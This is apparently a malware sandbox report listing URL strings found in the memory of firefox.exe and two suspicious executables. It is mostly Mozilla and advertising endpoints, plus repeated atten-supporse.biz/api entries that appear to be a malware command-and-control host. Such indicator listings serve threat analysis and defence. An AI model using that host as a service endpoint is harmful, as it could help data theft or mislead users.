Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000003.2923613146.000001DEF11C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulJ
Source: firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.upgradeBackup.maxU
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/parent/ext-
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001F.00000003.2739221096.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2738035698.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970101056.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.videolan.org/x264.html
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/autocomplete-richlistitem
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000003.2904698358.000001DEF249F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF7083000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057721005.000001DEECA28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573323312.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/L
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678528544.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656607404.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/ac
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656804081.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api3Co
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2961232201.00000000012CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiPC
Source: a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apibV7Ryd
Source: a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiH
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2627978100.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiZqY2EqXqknUgpH6oCFyW/SwlkltNsdwG0IiPX9UX11rVdhzlFCaipm6aO0i/7CII7Y
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apif0cK3T
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001C.00000003.2925812595.000001DEF10B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
